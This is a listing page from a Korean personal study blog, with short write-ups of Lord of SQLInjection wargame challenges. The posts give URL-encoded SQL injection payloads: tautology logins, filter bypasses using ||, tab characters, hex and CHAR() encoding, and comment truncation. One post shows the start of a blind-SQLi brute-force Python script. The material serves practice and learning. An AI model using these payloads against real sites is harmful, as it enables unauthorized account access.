메모장

내가 보고 내가 참고하기 위해서 만든 블로그

웹해킹

문제에서는 or과 and를 필터링하고 있는 모습이다. 그렇다면 or and를 대신하는 기호를 사용하면 문제가 풀릴 거다. or과 and는 각각 ||, &&로 바꿀 수있다. URL: ?pw=1%27%20||%20id%20=%20%27admin pw='1' || id = 'admin'

2023. 7. 1.

웹해킹

공백이 필터링되는 문제다. 하지만 공백은 %09나 주석으로 우회가 가능하다. 나는 그래서 %09로 우회를 했다. URL: ?pw=1%27%09or%09id=%27admin pw='1' or id='admin'

2023. 7. 1.

웹해킹

다른 문제들과 다르게 pw를 맞추면 풀리는 문제다. 일단 비밀번호 길이를 알아보자. pw=1%27%20or%20length(pw)=%278 pw='1' or length(pw)='8' 비밀번호가 8자리다. 그럼 블라인드 SQLi로 admin의 비밀번호를 알아내야한다. import requests URL = "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php" cookies = {'PHPSESSID': '각자 쿠키값'} password = '' for length in range(1,9):#비밀번호 길이 수만큼 반복 for pw in range(48, 128):#아스키에서 숫자, 알파벳, 특수 문자, 구두점, 공백 포함 payload..

2023. 7. 1.

웹해킹

문제를 보면 싱글쿼트, 더블쿼트를 전부 필터링하고 있다. no=2 or id를 admin으로 해도 문자열을 변수명으로 인식해서 인지 안된다. 그래서 admin을 우회해서 입력을 받아야한다. 그리고 no=1이면 guest로 로그인 되기 때문에 no=1이 아닌 다른 수로 해야 한다. 따라서 admin을 hex값으로 바꾸거나 char함수를 써서 admin을 바꿔줘야한다. 혹은 2진수로 바꿔서 하거나 또 다른 방법은 admin의 no를 찾는 방법도 있다. URL: ?no=2%20or%20id=CHAR(0x61,%200x64,%200x6D,%200x69,%200x6E) no=2 or id=0x61646D696E URL: ?no=2%20or%20id=0x61646D696E no=2 or id=CHAR(0x61, 0..

2023. 7. 1.

웹해킹

문제를 보면 id=admin이면 풀린다. 허나 비밀번호는 md5처리 되어 id의 인자값으로만 문제를 풀어야 한다. 이 문제의 경우 2개의 풀이 방법이 있다. 하나는 id=admin 뒤에 or 구문만 써주면 된다. 또 다른 하나는 뒤에있는 pw를 주석 처리하면 된다. 1번째 방법은 true or false and false == true를 이용한 방법이다. 참고로 true or true and false도 똑같다. URL: ?id=admin%27%20or%20%271%27=%272 id='admin' or '1'='2' and pw=md5('') 2번째 방법은 뒤에 pw부분을 주석처리 해버리는 것이다. URL: ?id=admin%27%23 id=admin'# 참고:#를 %23으로 바꿔서 풀어야 한다.

2023. 6. 30.

웹해킹

LOS 1번째 문제다. id 와 pw에 sql injection을 해서 로그인하면 되는 문제다. and 연산자가 or 연산자보다 우선순위가 높은것을 이용한 문제로 간단히 id와 pw에 1' or '1'='1을 넣으면 풀린다. url은 ?id=1%27%20or%20%271%27=%271&pw=1%27%20or%20%271%27=%271 sql injection 공부하면서 처음으로 까다로운 점은 작은 따옴표('')를 맞춰줘야 한다는 점이다. 작은 따옴표의 경우 처음에는 익숙하지 않지만 문법을 끼워 맞춘다고 생각하면서 작은 따옴표를 끼워 맞추면 나중에는 익숙해진다.

2023. 6. 30.